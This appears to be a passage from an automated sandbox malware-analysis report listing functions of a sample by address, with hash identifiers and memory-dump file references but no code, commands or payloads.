                    • Opcode Fuzzy Hash: 8ed7f3e0638b35094f87ca31b834958beedcdc7109c42454e8f02b1d63a1ea09
                    • Instruction Fuzzy Hash: 2A416975524290CAC7628F28EC91B2B3BB8FF58310F05662AE855CF3E1E3399C52CB55
                    Function 003C0E43 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: b
                    • API String ID: 0-1908338681
                    • Opcode ID: 9559fb28174f7c810818aea5259d7a8e469aa8e839de53408177af38d9031bbd
                    • Instruction ID: b0c4ed8e69746b2b66a2585b3db435acbe52d46ca764103777eb24a61a185999
                    • Opcode Fuzzy Hash: 9559fb28174f7c810818aea5259d7a8e469aa8e839de53408177af38d9031bbd
                    • Instruction Fuzzy Hash: 7A415B70101A41CBE719CF28C5A0B57BBF2BF46308F48C95CC89A4BB86D779E815CB91
                    Function 003E3458 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID: $WC
                    • API String ID: 0-3660246167
                    • Opcode ID: 68fd6d701bb02ec046310689b7b8433c1ced5921008034102b1a73118603ca40
                    • Instruction ID: 82321c11074591a9f697517756676c5aa0f2cc6fe6ae2d5ef76de267161b7729
                    • Opcode Fuzzy Hash: 68fd6d701bb02ec046310689b7b8433c1ced5921008034102b1a73118603ca40
                    • Instruction Fuzzy Hash: C6B09228E48002CB860DCF16E852479B23EBFE7398F6AB109C10223226C2209416C90C
                    Function 003B7B20 Relevance: .8, Instructions: 834COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d0e216ed0a704337ed908747c7b1b2b59eec00d53247d36d14fc8b2f108634b2
                    • Instruction ID: 337e50c1c1f6beb28ccdea489193c267ec02631fca163fdf91a4d0990cc4a290
                    • Opcode Fuzzy Hash: d0e216ed0a704337ed908747c7b1b2b59eec00d53247d36d14fc8b2f108634b2
                    • Instruction Fuzzy Hash: F35214315087168BC326DF18D4806BAB3E5FFC4318F198A2DDAC687785EB34E951CB86
                    Function 003B3240 Relevance: .7, Instructions: 704COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 447641964718a8d67fd26f079305efad687d46d7eb7f10484d05436028ce6224
                    • Instruction ID: 798f54a37ec307d96e8f7a139ff9c512143bf3cf2e659e9c05396ac87df92354
                    • Opcode Fuzzy Hash: 447641964718a8d67fd26f079305efad687d46d7eb7f10484d05436028ce6224
                    • Instruction Fuzzy Hash: 5F52A1706087518FC326CF29C0906ABFBE1FF88318F548A6EE5DA87A55D734EA45CB41
                    Function 003B3C60 Relevance: .6, Instructions: 609COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 440ffb770517907e36eeb1632b60d61a0a731cb2b511d98343363fe2441ea200
                    • Instruction ID: eaa17731a6665dc62828db9c786a91f4ad40c00b41f6012af11a1ecaf06c2e96
                    • Opcode Fuzzy Hash: 440ffb770517907e36eeb1632b60d61a0a731cb2b511d98343363fe2441ea200
                    • Instruction Fuzzy Hash: 52424570514B118FC36ACF28C5806AABBF1BF95318B648A2ED6978BF91D335F944CB14
                    Function 003B5F30 Relevance: .5, Instructions: 497COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2a941933e8ca85ebb10461d6333f8e3c45baab462521f67feacd141c0ee993f8
                    • Instruction ID: 8fe36f43d453244c811e5f74618333e461e5e4a4333bff2857ad2c365d112e79
                    • Opcode Fuzzy Hash: 2a941933e8ca85ebb10461d6333f8e3c45baab462521f67feacd141c0ee993f8
                    • Instruction Fuzzy Hash: 4D02D4356083408FDB15CF19C88179FBBE6AFC9304F09886DE9898B756DB79D805CB92
                    Function 003D2382 Relevance: .4, Instructions: 396COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ac239e965ffb39791d63939eac7bcde5a26a364d11efba750a2532613d6866a1
                    • Instruction ID: 5db804d1bdbe68e02219c72f20cb2fa788c3180d6c518cbe49c1e45199323977
                    • Opcode Fuzzy Hash: ac239e965ffb39791d63939eac7bcde5a26a364d11efba750a2532613d6866a1
                    • Instruction Fuzzy Hash: 1ED1E571104B418BD3368F35D0943A3BBE2BFA6304F158A5ED4EB8B786D775A509CB50
                    Function 003C3A27 Relevance: .4, Instructions: 384COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1376befacd1f7e3410b9d97706c96d89e54b3bc0cb57036b795db81167c330f9
                    • Instruction ID: 26233d564013842e599d06c8db08104177c37326e4c2f3b6a10d628c621b8c69
                    • Opcode Fuzzy Hash: 1376befacd1f7e3410b9d97706c96d89e54b3bc0cb57036b795db81167c330f9
                    • Instruction Fuzzy Hash: AAD1CB71108B408FD72A8F25C4A1BA2BBE2FF56320B198A5DD4978BB95C735ED05CB84
                    Function 003DEF80 Relevance: .2, Instructions: 189COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bb0564d9bcdf403d2e4839fd4c5ad673e14c5f1acf4c73d570165f63ae789460
                    • Instruction ID: 640e98b17019da542cc3f34b713c49db15f1c35a702ccd7faac008374b4416cc
                    • Opcode Fuzzy Hash: bb0564d9bcdf403d2e4839fd4c5ad673e14c5f1acf4c73d570165f63ae789460
                    • Instruction Fuzzy Hash: CF515DB25087548FE314DF29D89475BBBE1BBC4318F054A2EE4E587351E379D6088B82
                    Function 003CD622 Relevance: .2, Instructions: 186COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0d15f6b388cc353afe737a741ce76b4061afaab755247e17e5e4580eeade0723
                    • Instruction ID: 108739cd16db3511b7ce27e0581e2bcc7db46905abac4005a6de633d7b48c982
                    • Opcode Fuzzy Hash: 0d15f6b388cc353afe737a741ce76b4061afaab755247e17e5e4580eeade0723
                    • Instruction Fuzzy Hash: CF518F71604B408FD72ACF29C481B66B7E2BB95310F598A3DD49ACBB81DA34F845CB50
                    Function 003E2156 Relevance: .1, Instructions: 148COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 633d5bac2d43fdc3379a3c4e21eb70720ad93a7c7d956b3f4a5cb0bcb2435f7b
                    • Instruction ID: 0ab5561b71a4ae4757545119c01290794d46315ab14e09f6118460b66d0d476f
                    • Opcode Fuzzy Hash: 633d5bac2d43fdc3379a3c4e21eb70720ad93a7c7d956b3f4a5cb0bcb2435f7b
                    • Instruction Fuzzy Hash: 26515CB0900B408FD3289F2AD95AB237BA5EB09314F11875CE9A68B7E2D374E444CBC5
                    Function 003BFDB0 Relevance: .1, Instructions: 139COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 46383ea8c0c13773274aa415cd04ed9994c68b94604d21e41f10e855136e399a
                    • Instruction ID: e95147ae4e4a8f68075ecab113b12107344cfad75057bbbd617a33b49dc92bc3
                    • Opcode Fuzzy Hash: 46383ea8c0c13773274aa415cd04ed9994c68b94604d21e41f10e855136e399a
                    • Instruction Fuzzy Hash: 7B41B5726082504FE3099A3AC8A037ABBD2AFC9314F1A863DF1E9877D1D678C545D711
                    Function 003B2E70 Relevance: .1, Instructions: 95COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f5d8d8307fa136f55f7f5d388184e1b1d2e583fc5b836a9dab38bc0a95f815f4
                    • Instruction ID: 752389183ff9fc548d87409521de48a0a3e2fb9ee3c382e6ca4f48e6f1b7d143
                    • Opcode Fuzzy Hash: f5d8d8307fa136f55f7f5d388184e1b1d2e583fc5b836a9dab38bc0a95f815f4
                    • Instruction Fuzzy Hash: 1821F8257181E10BC765CE7A9CC057777A3DBC7316B2E8376EB80C7A96D23AD8068250
                    Function 003E4FB2 Relevance: .1, Instructions: 83COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 64a0d51ecdb21380397ce5b78989964821fb794bc37cc94022c655011b96d591
                    • Instruction ID: 307539edc5d92527727aa15180ae51af600f06c0ce603548ad055acda738c53e
                    • Opcode Fuzzy Hash: 64a0d51ecdb21380397ce5b78989964821fb794bc37cc94022c655011b96d591
                    • Instruction Fuzzy Hash: 64016D2280CBAC09D71B6970A8B1337BA975B8B295F0A271DE5F95B0D2F516D90542C4
                    Function 003DD620 Relevance: .1, Instructions: 64COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                    • Instruction ID: da3aee97af63a81a8f72127ccc1c0463b66d7c28bc82bb6d090d885dad8cebff
                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                    • Instruction Fuzzy Hash: F2118633B551D40EC3178D3C9400965BFA35AE3635B99839AE4F89B3D2D622CD8A83A5
                    Function 003D0D8E Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 540cf86dd6f27a7e7894059b4a544ce52aed81d6bb7ea8c34196298feae4f2d5
                    • Instruction ID: f47790a9a7d1c9aa54641f8def3b70466b0312994cd15624a6e077459c11c1a0
                    • Opcode Fuzzy Hash: 540cf86dd6f27a7e7894059b4a544ce52aed81d6bb7ea8c34196298feae4f2d5
                    • Instruction Fuzzy Hash: FC211275105BD04FD76A8B28D8A47A7BBF0BF12306F49599ED0E7CB292D724A409CF14
                    Function 003C05BD Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12419894ae8aea688bbb5987c71f7953eb0fa114fb69baaabbaac9dfc98b24b0
                    • Instruction ID: 4411e4f2bf5c53ff110478649fc027648a2e64c6a65f465b492abf7ecfe47325
                    • Opcode Fuzzy Hash: 12419894ae8aea688bbb5987c71f7953eb0fa114fb69baaabbaac9dfc98b24b0
                    • Instruction Fuzzy Hash: B2112870201A429BD71A8F20C964B17F7B6EF82704F158A1CC4568BF81C779B925CB84
                    Function 003C561D Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4d426b1302380c60290198b351a4c5e905b95e0f89911e98bdf4472acdddccd9
                    • Instruction ID: d61e893d75e959bbcb1bb4273521180372d7606c361b5ab655ebeb69c33d3e85
                    • Opcode Fuzzy Hash: 4d426b1302380c60290198b351a4c5e905b95e0f89911e98bdf4472acdddccd9
                    • Instruction Fuzzy Hash: C81125B5518384AFC745DF24D88085FBBF0FB89358F842A2CF8859B252D330E9918F06
                    Function 003E52C9 Relevance: .0, Instructions: 33COMMON
                    Download Yara Rule
                    Memory Dump Source
